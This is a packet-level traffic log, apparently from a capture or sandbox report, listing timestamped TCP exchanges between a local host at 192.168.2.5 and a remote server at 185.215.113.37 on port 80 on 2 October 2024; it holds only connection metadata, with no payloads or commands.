Oct 2, 2024 23:10:14.831562996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.831568003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.831573963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.831583023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.831584930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.831593037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.831602097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.831608057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.831612110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.831621885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.831630945 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.831631899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.831641912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.831645012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.831666946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.831691027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.832519054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.832530975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.832540035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.832549095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.832557917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.832567930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.832576990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.832585096 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.832587004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.832598925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.832607985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.832612991 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.832617998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.832623005 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.832628012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.832638025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.832647085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.832657099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.832657099 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.832667112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.832678080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.832695961 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.832709074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.833590984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.833602905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.833611012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.833620071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.833627939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.833646059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.833653927 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.833656073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.833664894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.833674908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.833674908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.833683968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.833693027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.833694935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.833703041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.833713055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.833714962 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.833723068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.833724976 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.833733082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.833743095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.833748102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.833753109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.833758116 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.833785057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.834777117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.834789038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.834798098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.834806919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.834880114 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.928267002 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.937372923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.166312933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.166337967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.166351080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.166383028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.166393995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.166405916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.166420937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.166426897 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.166486979 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.167037964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.167051077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.167061090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.167072058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.167082071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.167087078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.167093992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.167104959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.167114973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.167125940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.167135954 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.167179108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.273951054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.273972034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.273983955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.273993969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.274005890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.274015903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.274027109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.274039984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.274051905 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.274082899 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.274111986 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.274209023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.274219036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.274230003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.274252892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.274270058 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.274285078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.274296045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.274307013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.274316072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.274326086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.274329901 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.274365902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.274584055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.274595022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.274605036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.274633884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.274652004 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.274739027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.274751902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.274764061 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.274796009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.274813890 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.274883032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.274893999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.274904013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.274914026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.274924040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.274934053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.274940014 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.274945021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.274955988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.274967909 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.274990082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.275002956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.275163889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.275204897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.275216103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.275219917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.275248051 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.360061884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.360157013 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.360346079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.360404015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.398070097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.398081064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.398089886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.398107052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.398118973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.398128986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.398140907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.398165941 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.398227930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.398382902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.398394108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.398402929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.398411989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.398421049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.398443937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.398471117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.398525953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.398541927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.398554087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.398565054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.398581982 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.398608923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.398668051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.398679018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.398688078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.398695946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.398705006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.398720026 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.398746967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.398895979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.398905993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.398915052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.398924112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.398952961 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.398979902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.399003029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.399012089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.399015903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.399024963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.399043083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.399060965 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.399087906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.399279118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.399290085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.399298906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.399308920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.399317980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.399337053 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.399375916 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.399564981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.399574995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.399583101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.399590969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.399600029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.399617910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.399622917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.399626970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.399636030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.399645090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.399651051 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.399655104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.399662971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.399683952 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.399712086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.399900913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.399912119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.399954081 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.399992943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.400005102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.400012970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.400022984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.400031090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.400039911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.400046110 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.400049925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.400058985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.400084972 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.400114059 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.400532961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.400542021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.400551081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.400558949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.400568962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.400577068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.400585890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.400594950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.400599003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.400604010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.400614023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.400625944 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.400655031 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.400676012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.400871992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.400882959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.400892973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.400901079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.400927067 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.400958061 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.522799015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.522813082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.522821903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.522830009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.522840023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.522850990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.522860050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.522869110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.522958994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.522968054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.522977114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.522984982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.522994041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.523003101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.523011923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.523016930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.523016930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.523045063 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.523045063 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.523066998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.523185015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.523199081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.523209095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.523219109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.523226976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.523243904 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.523283958 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.523490906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.523503065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.523511887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.523521900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.523530006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.523539066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.523664951 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.523669004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.523679018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.523688078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.523698092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.523736954 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.523762941 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.523768902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.523817062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.523822069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.523832083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.523842096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.523870945 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.523894072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.524064064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524074078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524082899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524092913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524101973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524111032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524116039 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.524121046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524130106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524142981 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.524164915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.524185896 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.524442911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524454117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524461985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524470091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524478912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524491072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524498940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524502993 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.524547100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.524578094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524626970 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.524743080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524755001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524761915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524771929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524780035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524787903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524794102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.524797916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524806976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524816990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524826050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524836063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524837971 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.524847031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524854898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.524861097 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.524889946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.525486946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.525496960 CEST	80	49704	185.215.113.37	192.168.2.5
